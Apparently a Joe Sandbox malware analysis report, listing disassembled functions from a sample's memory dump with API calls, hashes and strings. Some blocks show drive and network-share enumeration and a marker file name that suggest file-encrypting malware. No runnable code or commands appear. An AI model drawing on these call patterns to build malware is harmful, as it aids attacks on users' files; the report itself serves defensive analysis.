                                                                                                • Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                • Instruction ID: 8198ec34aa8999dc590647716f2dc488f85491d7af5cc04cf74bf98b0f8c793f
                                                                                                • Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                • Instruction Fuzzy Hash: F2514471F05139AEDF309A68DC99BAAB7B5EF04304F4400DAE908A6251E7399F80CF59
                                                                                                APIs
                                                                                                • timeGetTime.WINMM ref: 00411B1E
                                                                                                • timeGetTime.WINMM ref: 00411B29
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                • timeGetTime.WINMM ref: 00411B78
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                • String ID:
                                                                                                • API String ID: 3697694649-0
                                                                                                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                APIs
                                                                                                • __init_pointers.LIBCMT ref: 00425141
                                                                                                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                • __mtterm.LIBCMT ref: 0042514F
                                                                                                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                • __calloc_crt.LIBCMT ref: 00425174
                                                                                                • __initptd.LIBCMT ref: 00425196
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                • String ID:
                                                                                                • API String ID: 3567560977-0
                                                                                                • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 0042594A
                                                                                                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                • _free.LIBCMT ref: 00425970
                                                                                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                • __lock.LIBCMT ref: 00425989
                                                                                                • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                • _free.LIBCMT ref: 004259C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID:
                                                                                                • API String ID: 626533743-0
                                                                                                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                APIs
                                                                                                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ___from_strstr_to_strchr
                                                                                                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                • API String ID: 601868998-2416195885
                                                                                                • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                • API String ID: 2102423945-3653307630
                                                                                                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                APIs
                                                                                                • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                Strings
                                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                • API String ID: 3123740607-798102604
                                                                                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _fprintf_memset
                                                                                                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                • API String ID: 3021507156-3399676524
                                                                                                • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                APIs
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendFolder
                                                                                                • String ID: bowsakkdestx.txt
                                                                                                • API String ID: 29327785-2616962270
                                                                                                • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$CreateShowUpdate
                                                                                                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                • API String ID: 2944774295-3503800400
                                                                                                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                APIs
                                                                                                • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                • _memset.LIBCMT ref: 00410C4C
                                                                                                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                • String ID:
                                                                                                • API String ID: 364255426-0
                                                                                                • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                APIs
                                                                                                • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                • _strlen.LIBCMT ref: 00441734
                                                                                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                • _strnlen.LIBCMT ref: 004417BF
                                                                                                • __lock.LIBCMT ref: 004417D0
                                                                                                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                • String ID:
                                                                                                • API String ID: 2168648987-0
                                                                                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                APIs
                                                                                                • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                • String ID:
                                                                                                • API String ID: 2560635915-0
                                                                                                • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0043B70B
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                • _free.LIBCMT ref: 0043B71E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1020059152-0
                                                                                                • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
